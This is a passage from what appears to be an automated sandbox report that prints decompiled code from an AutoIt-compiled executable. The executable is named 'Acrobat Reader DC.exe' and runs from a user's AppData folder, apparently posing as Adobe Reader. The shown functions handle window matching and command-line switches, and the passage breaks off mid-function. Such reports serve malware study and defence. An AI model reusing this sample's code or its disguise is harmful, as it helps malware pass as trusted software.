                                  0x0042e089
                                  0x0042e091
                                  0x0042e09a
                                  0x00000000
                                  0x0042e09a
                                  0x00000000
                                  0x0040936e
                                  0x00409374
                                  0x00000000
                                  0x00409374
                                  0x0040936c
                                  0x0040933c
                                  0x004092fd
                                  0x004092eb
                                  0x0040924d
                                  0x0042d7cb
                                  0x0042d7d2
                                  0x00000000
                                  0x00000000
                                  0x0042d7d8
                                  0x0040926a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040926a
                                  0x00000000
                                  0x00409230

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchSleepTranslate
                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                  • API String ID: 1762048999-758534266
                                  • Opcode ID: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                  • Opcode Fuzzy Hash: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046ED8E Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 330 46ed8e-46ee39 call 4109e0 * 2 call 40e0a0 * 2 call 402160 call 40bc70 * 3 347 46ee4a-46ee4e 330->347 348 46ee3b-46ee47 call 4152bb 330->348 350 46ee50-46ee5a call 469296 347->350 351 46ee61-46ee6d call 436565 347->351 348->347 350->351 357 46eec5-46eed7 call 401c90 351->357 358 46ee6f-46ee77 call 436565 351->358 364 46eedd-46eeec call 401c90 357->364 365 46f2f9-46f305 call 436565 357->365 358->357 363 46ee79-46eec2 GetForegroundWindow call 44cdaf call 436299 call 402250 * 3 358->363 364->365 372 46eef2-46eefd 364->372 374 46f307-46f310 call 40e0a0 365->374 375 46f315-46f319 365->375 376 46ef00-46ef1c call 461a5b 372->376 374->375 379 46f322-46f32a 375->379 380 46f31b 375->380 376->365 391 46ef22-46ef36 call 445ae0 376->391 381 46f335-46f339 379->381 382 46f32c-46f330 call 410bc0 379->382 380->379 386 46f34a-46f354 381->386 387 46f33b-46f33f 381->387 382->381 392 46f356-46f363 GetDesktopWindow EnumChildWindows 386->392 393 46f365 EnumWindows 386->393 387->386 390 46f341-46f345 call 410bc0 387->390 390->386 402 46f1f5-46f209 call 445ae0 391->402 403 46ef3c-46ef50 call 445ae0 391->403 397 46f36b-46f385 call 4457df call 4109e0 392->397 393->397 416 46f387-46f390 call 44cdaf 397->416 417 46f395-46f3be call 402250 * 3 397->417 412 46f1ce-46f1f2 call 402250 * 3 402->412 413 46f20b-46f20f 402->413 414 46ef56-46ef6a call 445ae0 403->414 415 46f24b-46f25f call 445ae0 403->415 421 46f225-46f248 call 402250 * 3 413->421 422 46f211-46f21f 413->422 434 46f283-46f2a2 call 432c30 IsWindow 414->434 435 46ef70-46ef84 call 445ae0 414->435 415->412 430 46f265-46f26b GetForegroundWindow 415->430 416->417 422->421 437 46f26c-46f27a call 44cdaf 430->437 434->421 453 46f2a4-46f2a5 434->453 449 46ef86-46ef8b 435->449 450 46efe1-46eff5 call 445ae0 435->450 437->434 456 46f2a7-46f2cd call 402250 * 3 449->456 457 46ef91-46efa8 call 401070 449->457 462 46eff7-46f009 call 40e0a0 450->462 463 46f00e-46f022 call 445ae0 450->463 453->437 467 46efa9-46efb2 call 46906d 457->467 462->376 476 46f024-46f03a call 401070 463->476 477 46f03f-46f053 call 445ae0 463->477 467->376 479 46efb8-46efde call 402250 * 3 467->479 476->467 486 46f074-46f088 call 445ae0 477->486 487 46f055-46f06f call 413190 477->487 494 46f08a-46f0a4 call 413190 486->494 495 46f0a9-46f0bd call 445ae0 486->495 487->376 494->376 502 46f0de-46f0f2 call 445ae0 495->502 503 46f0bf-46f0d9 call 413190 495->503 508 46f0f4-46f10e call 413190 502->508 509 46f113-46f127 call 445ae0 502->509 503->376 508->376 514 46f145-46f159 call 445ae0 509->514 515 46f129-46f140 call 413190 509->515 520 46f17a-46f18e call 445ae0 514->520 521 46f15b-46f16f call 445ae0 514->521 515->376 527 46f1b4-46f1c8 call 44cd93 520->527 528 46f190-46f195 520->528 521->412 526 46f171-46f175 521->526 526->376 527->376 527->412 529 46f2d0-46f2f6 call 402250 * 3 528->529 530 46f19b-46f1af call 40e0a0 528->530 530->376
                                  C-Code - Quality: 78%
                                  			E0046ED8E(void* __eflags, void* __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24, char _a28, char _a32) {
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HWND__* _v80;
				signed int _v84;
				char _v88;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				void* _t158;
				signed int _t173;
				short* _t189;
				signed int _t193;
				signed int _t194;
				signed int _t198;
				signed int _t209;
				signed int _t211;
				char* _t214;
				signed int _t215;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t242;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int* _t252;
				signed int _t258;
				signed int _t263;
				signed int _t269;
				signed int* _t273;
				signed int _t277;
				intOrPtr* _t343;
				struct HWND__* _t371;
				signed int* _t373;
				signed int _t378;
				void* _t380;
				void* _t381;
				void* _t383;
				void* _t385;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t398;

				_t398 = __fp0;
				_t393 = __eflags;
				_t380 = (_t378 & 0xfffffff8) - 0x54;
				_t158 = E004109E0(_t157, _a16);
				_t343 = _a4;
				_v72 = _t343 + 0xec;
				E004109E0(_t158, _t343 + 0xec);
				_t323 = _a8;
				 *((char*)(_t343 + 4)) = _a32;
				 *((char*)(_t343 + 5)) = _a28;
				_v88 = _t343 + 0x14;
				E0040E0A0(_t343 + 0x14, _a8);
				_t361 = _t343 + 0x24;
				_v80 = _t343 + 0x24;
				E0040E0A0(_t343 + 0x24, _a12);
				_v88 = _t343 + 0xbc;
				E00402160(_t343 + 0xbc, 0x484ea8, _a8, _t343);
				 *(_t343 + 0x10) = _a20;
				 *(_t343 + 0xcc) = 1;
				 *((char*)(_t343 + 0xc)) = 1;
				 *((intOrPtr*)(_t343 + 8)) = 0;
				 *((intOrPtr*)(_t343 + 0xd0)) = 0;
				 *((intOrPtr*)(_t343 + 0xe4)) = 0;
				E0040BC70( &_v60, _t393);
				E0040BC70( &_v44, _t393);
				_t287 =  &_v28;
				E0040BC70( &_v28, _t393);
				_t169 =  *(_t343 + 0x10);
				if( *(_t343 + 0x10) < 0) {
					_t269 = E004152BB(_t323, _t169);
					_t380 = _t380 + 4;
					 *(_t343 + 0x10) = _t269;
					 *((char*)(_t343 + 0xc)) = 0;
				}
				_t395 =  *(_t343 + 0x10) - 4;
				if( *(_t343 + 0x10) == 4) {
					E00469296(_v88, _t395, _t398, _v88);
					 *(_t343 + 0x10) = 1;
				}
				if(E00436565(_v88) == 0 || E00436565(_t361) == 0) {
					_t362 = _v88;
					__eflags =  *((short*)(E00401C90(0, _v88, __eflags))) - 0x5b;
					_t273 = _a4;
					if(__eflags != 0) {
						L54:
						_t173 = E00436565( &_v20);
						__eflags = _t173;
						if(_t173 == 0) {
							E0040E0A0(_v88,  &_v20);
						}
						__eflags = _t273[2];
						if(_t273[2] == 0) {
							_t273[2] = 1;
						}
						_t273[2] = _t273[2] | 0x00000004;
						__eflags = _t273[3];
						if(_t273[3] == 0) {
							E00410BC0(_v76);
						}
						__eflags = _t273[2] & 0x00000001;
						if((_t273[2] & 0x00000001) != 0) {
							__eflags = _t273[3];
							if(_t273[3] == 0) {
								E00410BC0(_v88);
							}
						}
						__eflags = _a24;
						_push(_t273);
						_push(0x46130d);
						if(_a24 == 0) {
							EnumWindows(); // executed
						} else {
							EnumChildWindows(GetDesktopWindow(), ??, ??);
						}
						_t345 = _a16;
						E004109E0(E004457DF(_a16, _v76), _v76);
						__eflags = _t273[0x39] - 1;
						if(_t273[0x39] >= 1) {
							E0044CDAF( *((intOrPtr*)(_t345 + 4)), _t345, _t273,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 4)))))));
						}
						E00402250( &_v24);
						E00402250( &_v40);
						E00402250( &_v56);
						return _t273[0x39];
					} else {
						_t189 = E00401C90(_t273[6] - 1, _t362, __eflags);
						__eflags =  *_t189 - 0x5d;
						if( *_t189 == 0x5d) {
							_v84 = 1;
							_t350 = _t273[6] - 2;
							__eflags = _t273[6] - 2;
							while(1) {
								__eflags = E00461A5B(_v88, _t398, _v88,  &_v52,  &_v36,  &_v84, _t350);
								if(__eflags == 0) {
									goto L54;
								}
								_t193 = E00445AE0(__eflags,  &_v52, L"LAST");
								_t381 = _t380 + 8;
								__eflags = _t193;
								if(__eflags != 0) {
									_t194 = E00445AE0(__eflags,  &_v36, 0x484ea8);
									__eflags = _t194;
									if(_t194 == 0) {
										goto L42;
									} else {
										_t277 =  *_t273;
										__eflags = _t277;
										if(_t277 == 0) {
											goto L46;
										} else {
											_push( &_v80);
											_v80 =  *_t277;
											_push(_a16);
											goto L8;
										}
									}
								} else {
									_t303 =  &_v52;
									_t209 = E00445AE0(__eflags,  &_v52, L"ACTIVE");
									_t383 = _t381 + 8;
									__eflags = _t209;
									if(__eflags != 0) {
										_t211 = E00445AE0(__eflags,  &_v36, 0x484ea8);
										__eflags = _t211;
										if(_t211 == 0) {
											goto L42;
										} else {
											_push(GetForegroundWindow());
											goto L49;
										}
									} else {
										_t215 = E00445AE0(__eflags,  &_v52, L"HANDLE");
										_t385 = _t383 + 8;
										__eflags = _t215;
										if(__eflags != 0) {
											E00432C30(__eflags, _v36,  &_v80);
											_t371 = _v80;
											_t218 = IsWindow(_t371);
											__eflags = _t218;
											if(_t218 == 0) {
												L46:
												E00402250( &_v20);
												E00402250( &_v36);
												E00402250( &_v52);
												__eflags = 0;
												return 0;
											} else {
												_push(_t371);
												L49:
												_push(_t273);
												E0044CDAF(_t303, _t350);
												_v88 =  *( *_t273);
												_t214 =  &_v88;
												goto L7;
											}
										} else {
											_t220 = E00445AE0(__eflags,  &_v52, L"REGEXPTITLE");
											_t380 = _t385 + 8;
											__eflags = _t220;
											if(__eflags == 0) {
												_t222 = E00445AE0(__eflags,  &_v52, L"CLASS");
												_t380 = _t380 + 8;
												__eflags = _t222;
												if(__eflags == 0) {
													_t223 = E00445AE0(__eflags,  &_v52, L"REGEXPCLASS");
													_t380 = _t380 + 8;
													__eflags = _t223;
													if(__eflags == 0) {
														_t224 = E00445AE0(__eflags,  &_v52, "X");
														_t387 = _t380 + 8;
														__eflags = _t224;
														if(__eflags == 0) {
															_t225 = E00445AE0(__eflags,  &_v52, "Y");
															_t388 = _t387 + 8;
															__eflags = _t225;
															if(__eflags == 0) {
																_t227 = E00445AE0(__eflags,  &_v52, "W");
																_t389 = _t388 + 8;
																__eflags = _t227;
																if(__eflags == 0) {
																	_t228 = E00445AE0(__eflags,  &_v52, "H");
																	_t390 = _t389 + 8;
																	__eflags = _t228;
																	if(__eflags == 0) {
																		_t229 = E00445AE0(__eflags,  &_v52, L"INSTANCE");
																		_t391 = _t390 + 8;
																		__eflags = _t229;
																		if(__eflags == 0) {
																			_t231 = E00445AE0(__eflags,  &_v52, L"ALL");
																			_t392 = _t391 + 8;
																			__eflags = _t231;
																			if(__eflags == 0) {
																				_t232 = E00445AE0(__eflags,  &_v52, L"TITLE");
																				_t380 = _t392 + 8;
																				__eflags = _t232;
																				if(__eflags == 0) {
																					_t233 = E0044CD93(__eflags,  &_v52, 0x484ea8);
																					_t380 = _t380 + 8;
																					__eflags = _t233;
																					if(_t233 == 0) {
																						continue;
																					} else {
																						goto L42;
																					}
																				} else {
																					_t234 = _t273[2];
																					__eflags = _t234 & 0x00000002;
																					if((_t234 & 0x00000002) != 0) {
																						E00402250( &_v20);
																						E00402250( &_v36);
																						E00402250( &_v52);
																						return 0xfffffffc;
																					} else {
																						_t273[2] = _t234 | 0x00000001;
																						E0040E0A0( &_v20,  &_v36);
																						continue;
																					}
																				}
																			} else {
																				_t242 = E00445AE0(__eflags,  &_v36, 0x484ea8);
																				_t380 = _t392 + 8;
																				__eflags = _t242;
																				if(_t242 == 0) {
																					L42:
																					E00402250( &_v20);
																					E00402250( &_v36);
																					_t198 = E00402250( &_v52) | 0xffffffff;
																					__eflags = _t198;
																					return _t198;
																				} else {
																					_t273[2] = _t273[2] | 0x00000040;
																					continue;
																				}
																			}
																		} else {
																			_t273[2] = _t273[2] | 0x00000020;
																			_push(_v36);
																			_t243 = E00413190();
																			_t380 = _t391 + 4;
																			_t273[0x33] = _t243;
																			continue;
																		}
																	} else {
																		_t273[2] = _t273[2] | 0x00000400;
																		_push(_v36);
																		_t245 = E00413190();
																		_t380 = _t390 + 4;
																		_t273[0x38] = _t245;
																		continue;
																	}
																} else {
																	_t273[2] = _t273[2] | 0x00000200;
																	_push(_v36);
																	_t246 = E00413190();
																	_t380 = _t389 + 4;
																	_t273[0x37] = _t246;
																	continue;
																}
															} else {
																_t273[2] = _t273[2] | 0x00000100;
																_push(_v36);
																_t247 = E00413190();
																_t380 = _t388 + 4;
																_t273[0x36] = _t247;
																continue;
															}
														} else {
															_t273[2] = _t273[2] | 0x00000080;
															_push(_v36);
															_t249 = E00413190();
															_t380 = _t387 + 4;
															_t273[0x35] = _t249;
															continue;
														}
													} else {
														_t273[2] = _t273[2] | 0x00000010;
														_t373 =  &(_t273[0x1e]);
														E00401070(_t373);
														_push( &_v36);
														_t314 =  &_v60;
														_push( &_v60);
														goto L19;
													}
												} else {
													_t273[2] = _t273[2] | 0x00000008;
													E0040E0A0(_v80,  &_v36);
													continue;
												}
											} else {
												_t258 = _t273[2];
												__eflags = _t258 & 0x00000001;
												if((_t258 & 0x00000001) != 0) {
													E00402250( &_v20);
													E00402250( &_v36);
													E00402250( &_v52);
													return 0xfffffffd;
												} else {
													_t263 = _t258 | 0x00000002;
													__eflags = _t263;
													_t373 =  &(_t273[0xd]);
													_t273[2] = _t263;
													E00401070(_t373);
													_t314 =  &_v36;
													_push( &_v36);
													_push( &_v68);
													L19:
													_push(_t373);
													_t252 = E0046906D(_t314, __eflags);
													__eflags =  *_t252;
													if( *_t252 == 0) {
														continue;
													} else {
														E00402250( &_v20);
														E00402250( &_v36);
														E00402250( &_v52);
														return 0xfffffffe;
													}
												}
											}
										}
									}
								}
								goto L69;
							}
						}
						goto L54;
					}
				} else {
					E0044CDAF(_t287, _t343, _t343, GetForegroundWindow());
					_v96 =  *((intOrPtr*)( *_t343));
					_t214 =  &_v96;
					L7:
					_push(_t214);
					_push(_a16);
					L8:
					E00436299();
					E00402250( &_v28);
					E00402250( &_v44);
					E00402250( &_v60);
					return 1;
				}
				L69:
			}










































































                                  0x0046ed8e
                                  0x0046ed8e
                                  0x0046ed94
                                  0x0046ed9d
                                  0x0046eda2
                                  0x0046edab
                                  0x0046edaf
                                  0x0046edb4
                                  0x0046edc1
                                  0x0046edc4
                                  0x0046edc7
                                  0x0046edcb
                                  0x0046edd3
                                  0x0046edd7
                                  0x0046eddb
                                  0x0046edeb
                                  0x0046edef
                                  0x0046edf9
                                  0x0046ee00
                                  0x0046ee0a
                                  0x0046ee0e
                                  0x0046ee11
                                  0x0046ee17
                                  0x0046ee1d
                                  0x0046ee26
                                  0x0046ee2b
                                  0x0046ee2f
                                  0x0046ee34
                                  0x0046ee39
                                  0x0046ee3c
                                  0x0046ee41
                                  0x0046ee44
                                  0x0046ee47
                                  0x0046ee47
                                  0x0046ee4a
                                  0x0046ee4e
                                  0x0046ee55
                                  0x0046ee5a
                                  0x0046ee5a
                                  0x0046ee6d
                                  0x0046eec5
                                  0x0046eed0
                                  0x0046eed4
                                  0x0046eed7
                                  0x0046f2f9
                                  0x0046f2fe
                                  0x0046f303
                                  0x0046f305
                                  0x0046f310
                                  0x0046f310
                                  0x0046f315
                                  0x0046f319
                                  0x0046f31b
                                  0x0046f31b
                                  0x0046f322
                                  0x0046f326
                                  0x0046f32a
                                  0x0046f330
                                  0x0046f330
                                  0x0046f335
                                  0x0046f339
                                  0x0046f33b
                                  0x0046f33f
                                  0x0046f345
                                  0x0046f345
                                  0x0046f33f
                                  0x0046f34a
                                  0x0046f34e
                                  0x0046f34f
                                  0x0046f354
                                  0x0046f365
                                  0x0046f356
                                  0x0046f35d
                                  0x0046f35d
                                  0x0046f36f
                                  0x0046f379
                                  0x0046f37e
                                  0x0046f385
                                  0x0046f390
                                  0x0046f390
                                  0x0046f39f
                                  0x0046f3a8
                                  0x0046f3b1
                                  0x0046f3be
                                  0x0046eedd
                                  0x0046eee3
                                  0x0046eee8
                                  0x0046eeec
                                  0x0046eef5
                                  0x0046eefd
                                  0x0046eefd
                                  0x0046ef00
                                  0x0046ef1a
                                  0x0046ef1c
                                  0x00000000
                                  0x00000000
                                  0x0046ef2c
                                  0x0046ef31
                                  0x0046ef34
                                  0x0046ef36
                                  0x0046f1ff
                                  0x0046f207
                                  0x0046f209
                                  0x00000000
                                  0x0046f20b
                                  0x0046f20b
                                  0x0046f20d
                                  0x0046f20f
                                  0x00000000
                                  0x0046f211
                                  0x0046f21a
                                  0x0046f21b
                                  0x0046f21f
                                  0x00000000
                                  0x0046f21f
                                  0x0046f20f
                                  0x0046ef3c
                                  0x0046ef3c
                                  0x0046ef46
                                  0x0046ef4b
                                  0x0046ef4e
                                  0x0046ef50
                                  0x0046f255
                                  0x0046f25d
                                  0x0046f25f
                                  0x00000000
                                  0x0046f265
                                  0x0046f26b
                                  0x00000000
                                  0x0046f26b
                                  0x0046ef56
                                  0x0046ef60
                                  0x0046ef65
                                  0x0046ef68
                                  0x0046ef6a
                                  0x0046f28d
                                  0x0046f292
                                  0x0046f29a
                                  0x0046f2a0
                                  0x0046f2a2
                                  0x0046f225
                                  0x0046f229
                                  0x0046f232
                                  0x0046f23b
                                  0x0046f240
                                  0x0046f248
                                  0x0046f2a4
                                  0x0046f2a4
                                  0x0046f26c
                                  0x0046f26c
                                  0x0046f26d
                                  0x0046f276
                                  0x0046f27a
                                  0x00000000
                                  0x0046f27a
                                  0x0046ef70
                                  0x0046ef7a
                                  0x0046ef7f
                                  0x0046ef82
                                  0x0046ef84
                                  0x0046efeb
                                  0x0046eff0
                                  0x0046eff3
                                  0x0046eff5
                                  0x0046f018
                                  0x0046f01d
                                  0x0046f020
                                  0x0046f022
                                  0x0046f049
                                  0x0046f04e
                                  0x0046f051
                                  0x0046f053
                                  0x0046f07e
                                  0x0046f083
                                  0x0046f086
                                  0x0046f088
                                  0x0046f0b3
                                  0x0046f0b8
                                  0x0046f0bb
                                  0x0046f0bd
                                  0x0046f0e8
                                  0x0046f0ed
                                  0x0046f0f0
                                  0x0046f0f2
                                  0x0046f11d
                                  0x0046f122
                                  0x0046f125
                                  0x0046f127
                                  0x0046f14f
                                  0x0046f154
                                  0x0046f157
                                  0x0046f159
                                  0x0046f184
                                  0x0046f189
                                  0x0046f18c
                                  0x0046f18e
                                  0x0046f1be
                                  0x0046f1c3
                                  0x0046f1c6
                                  0x0046f1c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0046f190
                                  0x0046f190
                                  0x0046f193
                                  0x0046f195
                                  0x0046f2d4
                                  0x0046f2dd
                                  0x0046f2e6
                                  0x0046f2f6
                                  0x0046f19b
                                  0x0046f19e
                                  0x0046f1aa
                                  0x00000000
                                  0x0046f1aa
                                  0x0046f195
                                  0x0046f15b
                                  0x0046f165
                                  0x0046f16a
                                  0x0046f16d
                                  0x0046f16f
                                  0x0046f1ce
                                  0x0046f1d2
                                  0x0046f1db
                                  0x0046f1e9
                                  0x0046f1e9
                                  0x0046f1f2
                                  0x0046f171
                                  0x0046f171
                                  0x00000000
                                  0x0046f171
                                  0x0046f16f
                                  0x0046f129
                                  0x0046f12d
                                  0x0046f131
                                  0x0046f132
                                  0x0046f137
                                  0x0046f13a
                                  0x00000000
                                  0x0046f13a
                                  0x0046f0f4
                                  0x0046f0f8
                                  0x0046f0ff
                                  0x0046f100
                                  0x0046f105
                                  0x0046f108
                                  0x00000000
                                  0x0046f108
                                  0x0046f0bf
                                  0x0046f0c3
                                  0x0046f0ca
                                  0x0046f0cb
                                  0x0046f0d0
                                  0x0046f0d3
                                  0x00000000
                                  0x0046f0d3
                                  0x0046f08a
                                  0x0046f08e
                                  0x0046f095
                                  0x0046f096
                                  0x0046f09b
                                  0x0046f09e
                                  0x00000000
                                  0x0046f09e
                                  0x0046f055
                                  0x0046f059
                                  0x0046f060
                                  0x0046f061
                                  0x0046f066
                                  0x0046f069
                                  0x00000000
                                  0x0046f069
                                  0x0046f024
                                  0x0046f024
                                  0x0046f028
                                  0x0046f02b
                                  0x0046f034
                                  0x0046f035
                                  0x0046f039
                                  0x00000000
                                  0x0046f039
                                  0x0046eff7
                                  0x0046effb
                                  0x0046f004
                                  0x00000000
                                  0x0046f004
                                  0x0046ef86
                                  0x0046ef86
                                  0x0046ef89
                                  0x0046ef8b
                                  0x0046f2ab
                                  0x0046f2b4
                                  0x0046f2bd
                                  0x0046f2cd
                                  0x0046ef91
                                  0x0046ef91
                                  0x0046ef91
                                  0x0046ef94
                                  0x0046ef97
                                  0x0046ef9a
                                  0x0046ef9f
                                  0x0046efa3
                                  0x0046efa8
                                  0x0046efa9
                                  0x0046efa9
                                  0x0046efaa
                                  0x0046efaf
                                  0x0046efb2
                                  0x00000000
                                  0x0046efb8
                                  0x0046efbc
                                  0x0046efc5
                                  0x0046efce
                                  0x0046efde
                                  0x0046efde
                                  0x0046efb2
                                  0x0046ef8b
                                  0x0046ef84
                                  0x0046ef6a
                                  0x0046ef50
                                  0x00000000
                                  0x0046ef36
                                  0x0046ef00
                                  0x00000000
                                  0x0046eeec
                                  0x0046ee79
                                  0x0046ee81
                                  0x0046ee8a
                                  0x0046ee8e
                                  0x0046ee92
                                  0x0046ee95
                                  0x0046ee96
                                  0x0046ee97
                                  0x0046ee97
                                  0x0046eea0
                                  0x0046eea9
                                  0x0046eeb2
                                  0x0046eec2
                                  0x0046eec2
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                  • IsWindow.USER32(?), ref: 0046F29A
                                  • GetDesktopWindow.USER32 ref: 0046F356
                                  • EnumChildWindows.USER32 ref: 0046F35D
                                  • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                  • API String ID: 329138477-1919597938
                                  • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                  • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 91%
                                  			E00401F20(void* __ecx, void* __eflags, intOrPtr _a4, char _a7) {
				void* _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v80;
				struct HINSTANCE__* _v84;
				void* __edi;
				void* __esi;
				char _t68;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t100;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t127;
				void* _t148;
				intOrPtr* _t167;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_t177 = __eflags;
				_t159 =  &_v84;
				E0040E6E0( &_v84);
				_push(_a4);
				_v16 = 0;
				E00402560( &_v84, _t148, __eflags);
				GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
				_t68 = E00410100(0x4a7f6c,  &_v84, _t177); // executed
				_a7 = _t68;
				 *0x4a7f50 = 0x4a7f6c;
				E00410960(_t159,  &_v48,  &_v80);
				E00401B10(L"CMDLINERAW",  &_v32, _t177);
				E00401980(0, 1,  &_v48,  &_v32);
				E00402250( &_v32);
				E00408F40(L"CMDLINERAW",  &_v48);
				_t155 = L"CMDLINE";
				_v40 = 1;
				_v48 = 0;
				E00401B10(L"CMDLINE",  &_v32, _t177);
				E00401980(0, 0x100,  &_v48,  &_v32);
				E00402250( &_v32);
				E00401B10(L"CMDLINE",  &_v32, _t177);
				E0040C2C0(0,  &_v32,  &_v12,  &_v16);
				E00402250( &_v32);
				_t127 = _v56;
				E0040BC70( &_v32, _t177);
				E00401A10( &_v84,  &_v32,  &_v32);
				_t165 = _v32;
				_t85 = E004114AB(L"CMDLINE", L"/ErrorStdOut", _v32);
				_t171 = _t170 + 8;
				if(_t85 == 0) {
					 *0x4974e8 = 1;
					_t127 = _t127 - 1;
					E00401A10( &_v84,  &_v32, _t165);
					_t165 = _v32;
				}
				_t88 = E004114AB(_t155, L"/AutoIt3OutputDebug", _t165);
				_t172 = _t171 + 8;
				if(_t88 == 0) {
					 *0x4974e7 = 1;
					_t127 = _t127 - 1;
					E00401A10( &_v84,  &_v32, _t165);
					_t165 = _v32;
				}
				_t91 = E004114AB(_t155, L"/AutoIt3ExecuteLine", _t165);
				_t173 = _t172 + 8;
				if(_t91 == 0) {
					__eflags = _a7;
					 *0x4a7f58 = 1;
					 *0x4a7f54 = 0 | _a7 == 0x00000000;
					GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
					E00401A10( &_v84,  &_v32, _t165);
					E0040E0A0(0x4a7f5c,  &_v32);
					_t143 =  &_v32;
					_t127 = _t127 - 2;
					E00401A10( &_v84,  &_v32, 0x4a7f5c);
					_t165 = _v32;
				}
				_t100 = E004114AB(_t155, L"/AutoIt3ExecuteScript", _t165);
				_t174 = _t173 + 8;
				if(_t100 == 0) {
					if(_a7 != _t100) {
						 *0x4a7f54 = 0;
					} else {
						 *0x4a7f54 = 3;
					}
					E00401A10( &_v84,  &_v32, _t165);
					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _v32);
					_t174 = _t174 + 8;
					_t143 =  &_v32;
					_t127 = _t127 - 2;
					E00401A10( &_v84,  &_v32, _t165);
